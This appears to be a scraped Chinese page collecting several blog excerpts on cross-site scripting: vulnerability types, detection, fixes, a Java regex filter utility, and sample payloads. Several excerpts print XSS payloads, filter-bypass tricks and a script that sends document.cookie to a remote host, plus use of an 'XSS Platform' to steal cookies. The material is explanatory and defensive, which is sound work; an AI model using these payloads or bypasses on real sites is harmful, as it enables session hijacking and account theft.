精华内容
下载资源
问答
  • 跨站脚本漏洞-XSS
    千次阅读
    2022-02-18 15:04:49

    xss攻击是指利用网页的漏洞注入恶意的指令代码到网页,使得用户加载并执行攻击者恶意制造的网页程序,XSS攻击可以窃取cookie从而获得用户的账号和个人信息,网站挂马,有限的键盘信息,发送广告和垃圾短息。

    XSS漏洞分为三种,存储型,反射型和DOM型。

    检测方法:

    1.通过扫描工具appscan或者burpsuite工具扫描,查看与验证扫描结果中的XSS漏洞

    2.反射型XSS,在请求的url的参数后面拼接XSS脚本,看是否能正常执行

    3.存储型XSS,在保存数据的时候输入XSS脚本,检查数据是否能正常保存,测试时注意脚本的变种,如编码和大小写混编

    以上如果能正常执行则表示有XSS漏洞

    解决方案:

    1.输入过滤检查,过滤用户提交的 数据(转义,全角替换半角或直接拦截不通过),过滤脚本字符,如<script>alert,等

    2.输入编码转义,对输出内容中的特殊字符进行编码或者转义处理,如html编码,js编码等,前台js写入数据尽量使用text,不用html,因为html会执行数据中的标签,而text是将数据作为文本写入

    3.设置httponly属性,可缓解XSS攻击,但是需要注意禁止使用http trance方法

    4.定义全局的XSSfilter,对于request请求的数据和response的输出数据进行正则过滤

    5.最好的方式就是进行传输加密,对于请求的数据进行和响应的数据进行加密处理,数据一旦解密不开则是被破坏,返回无效请求即可

    更多相关内容
  • 这是存储性跨站脚本验证的一些特殊语句,可以用来查看内网、系统、app、web是否存在XSS漏洞
  • NULL 博文链接:https://songjianyong.iteye.com/blog/1754973
  • 本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该...
  • 基于分布式跨站脚本漏洞检测技术的研究,杨君,马兆丰,在Web应用程序的众多攻击中, XSS攻击是最常见的安全隐患之一。本文针对跨站脚本漏洞检测准确率和效率低下的问题,提出了一种分布��
  • 存储型跨站脚本漏洞校验

    千次阅读 2021-12-31 17:21:19
    存储型跨站脚本漏洞校验

    存储型跨站脚本漏洞校验:将用户输入的数据输出时,未对其中的特殊字符进行过滤及转义,使客户端浏览器将攻击者提供的数据当作代码执行。

    攻击者可利用该漏洞在客户端执行任意JavaScript脚本。

    package cn.tongmap.utility;
    
    import java.util.regex.Matcher;
    import java.util.regex.Pattern;
    
    /**
     * 存储型跨站脚本漏洞校验
     * @author lxzqz
     *
     */
    public class XssUtil {
    	private static Pattern[] patterns = new Pattern[] {
    			Pattern.compile("<script>(.*?)</script>", Pattern.CASE_INSENSITIVE),
    			Pattern.compile("src[\r\n]*=[\r\n]*\\\'(.*?)\\\'",Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL),
    			Pattern.compile("src[\r\n]*=[\r\n]*\\\"(.*?)\\\"",Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL),
    			Pattern.compile("</script>", Pattern.CASE_INSENSITIVE),
    			Pattern.compile("<script(.*?)>", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL),
    			Pattern.compile("eval\\((.*?)\\)", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL),
    			Pattern.compile("expression\\((.*?)\\)", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL),
    			Pattern.compile("javascript:", Pattern.CASE_INSENSITIVE),
    			Pattern.compile("vbscript:", Pattern.CASE_INSENSITIVE),
    			Pattern.compile("[\\s\'\"]+", Pattern.CASE_INSENSITIVE),
    			Pattern.compile("onload(.*?)=", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL),
    			Pattern.compile("alert(.*?)", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL),
    			Pattern.compile("<", Pattern.MULTILINE | Pattern.DOTALL),
    			Pattern.compile(">", Pattern.MULTILINE | Pattern.DOTALL),
    			Pattern.compile("(<(script|onerror|iframe|embed|frame|frameset|object|img|applet|body|html|style|layer|link|ilayer|meta|bgsound))") };
    
    
    	/**
    	 * 校验参数是否存在xss漏洞可疑
    	 *
    	 * @param value 需要校验的字符
    	 * @return 返回值:true 表示存在xss漏洞,false:不存在
    	 */
    	public static boolean check(String value) {
    		boolean isXss = false;
    		if (value != null) {
    			for (Pattern scriptPattern : patterns) {
    				Matcher matcher = scriptPattern.matcher(value);
    				if (matcher.find()) {
    					isXss = true;
    					break;
    				}
    			}
    		}
    		return isXss;
    	}
    
    }
    

    展开全文
  • XSS跨站脚本漏洞简介、原理及防护方法 XSS跨站漏洞原理及防护

    目录

    1.XSS跨站脚本漏洞简介

    2.XSS漏洞分类

    3.XSS漏洞原理

    4.XSS漏洞利用

    4.1XSS基础漏洞利用  

    4.2XSS平台利用

    5.XSS攻击过程

    6. XSS漏洞防护


    1.XSS跨站脚本漏洞简介

            XSS又叫CSS(cross site script),即跨站脚本攻击,是常见的Web应用程序安全漏洞之一。XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,是因WEB应用程序对用户输入过滤不足而产生的,当用户浏览这些网页时,就会执行其中的恶意代码。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端的逻辑,在这个基础上,黑客可以轻易地发起Cookie窃取,会话劫持,钓鱼欺骗等各种各样的攻击。

            攻击流程:

    2.XSS漏洞分类

            (1)反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。
            (2)存储型XSS:<持久化> 代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内)。
            (3)DOM型XSS:基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI ,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。

    3.XSS漏洞原理

            XSS攻击是在网页中嵌入客户端恶意脚本代码,这些恶意代码一般是使用JavaScript语言编写的。JavaScript可以用来获取用户的Cookie、改变网页内容、URL跳转,攻击者可以通过向Web页面注入JavaScript代码,来实现这些目的。

    4.XSS漏洞利用

    4.1XSS基础漏洞利用
            (1)漏洞利用
            盗取cookie:

    <script>alert(document.cookie)</script>

            构造页面跳转:

    <script>location='https"//www.hacker.com'</script>

            构造获取cookie并发送到远程主机:

    <script>document.location='http://127.0.0.1/test/cookie.phpcookie='+document.cookie</script>

            (2)常见注入点
            重灾区:评论区、留言区、个人信息、订单信息等
            针对型:站内信、网页即时通讯、私信、意见反馈
            存在风险:搜索框、当前目录、图片属性等
            白盒测试(代码审计)

            (3)常用payload 
            Script标签:

    <script>alert(/1/)</script>
    <script>prompt(1)</script> 
    <script>confirm(1)</script>
    <script src="http://attacker.org/malicious.js"></script>
    <script src=data:text/javascript,alert(1)></script>
    <script>setTimeout(alert(1),0)</script>

       Img标签:

    <img src=x onerror=alert(1)>  
    <img src=x onerror=prompt(1);>
    <img src=javascript:alert('1')>

            a标签:

    <a href=”javascript:alert(1)”>点击触发</a>
    <a href="http://www.hacker.com">点击触发</a>

            (4)常见绕过方法
        大小写绕过(<SCRIPT>、<scRiPt>等)
        双写绕过(<SCr<scRiPT>ipt>)
        关键字HTML编码绕过
        任意位置插入null字符(<im[%00]g οnerrοr=alert(xss) src=a>)
        JavaScript转义(<script>eval(‘a\154ert(1)’)</script>)

    4.2XSS平台利用

             XSS漏洞平台利用也叫漏洞利用框架,作用上来看就是一组“JavaScript工具集合”,比如:键盘输入记录、盗取cookie、表单劫持等。

            网上类似的平台很多,都是基于XSS Platform搭建的。登录XSS Platform(可自行搜索获取,也可以进行自己搭建),主界面如下:

    可以进行创建项目,选择攻击模块,之后便可能生成相关的攻击代码:

             当XSS Platform收到信息之后,就可以确定网站存在XSS跨站漏洞,并且可以拿到cookie信息,借此绕过账号密码登录目标账户。

    5.XSS攻击过程

    反射型XSS漏洞:
            Alice经常浏览某个网站,此网站为Bob所拥有。Bob的站点需要Alice使用用户名/密码进行登录,并存储了Alice敏感信息(比如银行帐户信息)。
    Tom 发现 Bob的站点存在反射性的XSS漏洞,Tom编写了一个包含恶意代码的URL,并利用各种手段诱使Alice点击,Alice在登录到Bob的站点后,浏览了 Tom 提供的URL,嵌入到URL中的恶意脚本在Alice的浏览器中执行。此脚本盗窃敏感信息(cookie、帐号信息等信息)。然后在Alice完全不知情的情况下将这些信息发送给 Tom。
            Tom 利用获取到的cookie就可以以Alice的身份登录Bob的站点,如果脚本的功更强大的话,Tom 还可以对Alice的浏览器做控制并进一步利用漏洞控制
    存储型XSS漏洞:
            Bob拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。
    Tom检测到Bob的站点存在存储型的XSS漏洞。Tom在Bob的网站上发布一个带有恶意脚本的热点信息,该热点信息存储在了Bob的服务器的数据库中,然后吸引其它用户来阅读该热点信息。Bob或者是任何的其他人如Alice浏览该信息之后,Tom的恶意脚本就会执行。Tom的恶意脚本执行后,Tom就可以对浏览器该页面的用户发动一起XSS攻击。

    6. XSS漏洞防护

            XSS跨站漏洞最终形成的原因是对输入与输出没有严格过滤,在页面执行JavaScript等客户端脚本,理论上来讲只要将敏感字符过滤,即可修补XSS跨站漏洞。

            防护方法可以参考:XSS(跨站脚本攻击)漏洞解决方案 - boboxing2017 - 博客园

                            XSS(跨站脚本)漏洞详解之XSS跨站脚本攻击漏洞的解决_谁动了我的bug的博客-CSDN博客_xss跨站脚本攻击

     跨站脚本漏洞(XSS)基础讲解 - 简书

    xss(跨站脚本攻击)漏洞原理实战 - 知乎

    展开全文
  • 跨站脚本攻击的英文全称CporSSSateScript,为了更好地区分样式表,缩写为XSS。原因是网站将客户键入的内容输出到页面,在此过程中...已知跨站脚本攻击漏洞有三种:1)存储;2)反射;3)基于DOM。测试方法:1.GET跨站脚...

    跨站脚本攻击的英文全称CporSSSateScript,为了更好地区分样式表,缩写为XSS。原因是网站将客户键入的内容输出到页面,在此过程中可能会有恶意代码被浏览器执行。跨站脚本攻击是指恶意攻击者将恶意html代码插进网页页面,当客户浏览网页时,嵌入网页页面的html代码将被执行,从而达到恶意客户的特殊目的。已知跨站脚本攻击漏洞有三种:1)存储;2)反射;3)基于DOM。

    测试方法:1.GET跨站脚本:键入参数后,逐个添加以下句子。以第一条为例,键入http://www.exmaple.com/page.xx?name=。文本输入框:需要测试页面上所有可以提交参数的地方。具体跨站脚本的测试句子可以根据实际情况自行结构,触发事件等进行切换。这里只列出一些最常见的结构句子。

    例子:登录窗口用户名中有反射XSS注入。点击图片登录,成功弹出内容。风险分析:

    攻击者可以利用这个漏洞构建钓鱼链接,欺骗受害者访问并填写用户名和密码,从而窃取客户的认证凭证。

    修复办法:

    1.整体修复方法:验证所有键入数据,有效检测攻击;适当编码所有输出数据,防止任何成功注入的脚本在浏览器端运行。具体如下:2.键入验证:在某些数据被接受为可显示或存储之前,使用标准键入验证机制验证所有键入数据的长度、类型、语法和业务规则。3.输出代码:在输出数据之前,确保客户提交的数据已经正确编码,建议对所有字符进行代码,而不仅个子集。4.明确指定输出的编码方法:不允许攻击者为客户选择编码方法(如ISO8859-1或UTF8)。5.注意黑名单验证方法的局限性:只找或替换一些字符(如或类似script的关键词),很容易被XSS变种攻击绕过验证机制。

    警惕标准化错误:在验证键入之前,必须进行解码和标准化,以满足当前应用的内部表达方式。请确认应用程序不会对同一键入进行两次解码。过滤客户端提交的数据,一般建议过滤掉特殊字符,如双引号()、尖括号(),或者过滤掉客户端提交的数据中包含的特殊字符,如将双引号(转换为实体形式,以下是需要过滤的常见字符。

    展开全文
  • NULL 博文链接:https://gqsunrise.iteye.com/blog/2214704
  • 跨站脚本是一种常见的针对Web应用程序安全的漏洞攻击方式。...实验结果表明,数据经过RE-SVM-RFE递归特征消去算法选择之后的SVM特征,预测的准确率更高,敏感度和特异度也更好,该算法能够有效地检测出跨站脚本漏洞
  • 跨站脚本漏洞XSS

    2021-05-29 14:00:20
    一、跨站脚本漏洞概述 由于web应用程序对用户的输入过滤不严,通过html注入篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在这个基础上黑客可以轻易的发起cookie资料窃取,会话劫持,钓鱼...
  • PHPCMS全系列某页面跨站脚本漏洞

    千次阅读 2022-04-15 10:10:10
    PHPCMS全系列某页面跨站脚本漏洞 详细说明: PHPCMS全系列错误报告页面跨站脚本漏洞。 两种版本 1、官方demo页面为url xss. 2、官方主站的错误报告页面,$info['error_link']去自referer,更改referer即可插入任意...
  • XSS跨站脚本漏洞

    2022-01-15 16:40:31
    XSS跨站脚本漏洞 XSS类型 XSS主要被分为三类,分别是:反射型、存储型和 DOM型。 反射型XSS 反射型XSS也被称为非持久性XSS,是现在最容易出现的一种XSS漏洞。当用户访问个带有XSS代码的URL请求时,服务器端...
  • JQuery跨站脚本漏洞

    2021-02-28 16:02:29
    jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞 影响范围: 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞 已测试...
  • 4.提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞 TIPS: 1.一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS; 2.由于后台可能存在过滤措施,构造的script可能会被...
  • 一、跨站脚本漏洞概述 1、漏洞概述 XSS漏洞一直是web漏洞中危害比较大的漏洞,在OWASP TOP10中一直是排在前三的。 XSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户。 XSS通常可以用于带钓鱼、前端...
  • 网站跨站脚本漏洞的修复方法: 1.利用第三方安全工具对网站上的XSS跨站漏洞进行修复。 2.对get、post、cookies进行安全效验。 3.对XSS跨站攻击代码进行拦截。 4.对前端输入的值以及输出的值进行全面的安全过滤。 5....
  • WEB漏洞-XSS跨站脚本漏洞解决方案

    千次阅读 2021-01-11 09:05:29
    通过手工测试,构造用户可控参数访问,发现网站部分页面对用户可控参数未做过滤限制,存在XSS跨站脚本漏洞,测试如下: POST /task/notepad/insertNotepad HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 ...
  • XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,...
  • 如果想从事安全方向,那么这些基本的漏洞都是需要掌握的 目录 一、XSS形成原因: 二、XSS分类: 1. 反射型XSS 2. 存储型XSS 3. DOM型XSS 1. 被攻击对象的不同 2. 解析位置不同 3. 存储时间不同 三、XXS...
  • 介绍各类XSS漏洞的情况,快速理解XSS漏洞原理。
  • Esri Arcgis Server 10.8.1及之前版本存在跨站脚本漏洞。远程攻击者可利用该漏洞通过诱导用户点击恶意链接执行任意JavaScript代码。 <**> 建议: 厂商补丁: ESRI 目前厂商已经发布了升级补丁以修复这个安全...
  • 文章目录简介:用法:(一)、Options:(二)、特别的用法:(三)、选择目标:(四)、 现测HTTP/HTTPS的连接类型:(五)、 配置请求:(六)、 系统验校器:(七)、 选择攻击向量(s):(八)、...跨站脚本者是一个自动框架
  • 存储型跨站脚本漏洞解决

    千次阅读 2019-05-21 15:27:13
    ,再次查询时候页面弹框,将脚本存入了数据库 解决:需要对特殊字符进行过滤 var pattern=/[`~!@#$^&*()|{}':;',\\\[\]\.<>\/?~!@#¥……&*()——|{}【】';:""'。,、?]/...
  • 漏洞概述 jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 由于jenkins Gitlab Hook 插件没有在build_...
  • 跨站脚本漏洞概述

    千次阅读 2019-04-14 21:40:50
    跨脚本漏洞常见类型: 危害:存储型>反射型>DOM型 反射型:交互的数据一般不会被存在数据库里,一次性,所见即所得,一般出现在查询。 存储型:交互的数据会被存在数据库里面,永久性存储,一般出现在留...
  • 最新系统漏洞--CKEditor跨站脚本漏洞

    千次阅读 2021-10-23 12:30:34
    CKEditor 4.14.0至4.16.1版本的HTML数据处理器存在跨站脚本漏洞。远程攻击者可通过特制的注释利用该漏洞注入JavaScript代码。 <**> 建议: 厂商补丁: CKEditor 目前厂商已经发布了升级补

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 33,662
精华内容 13,464
关键字:

跨站脚本漏洞

友情链接: RoquelikeProject_final.rar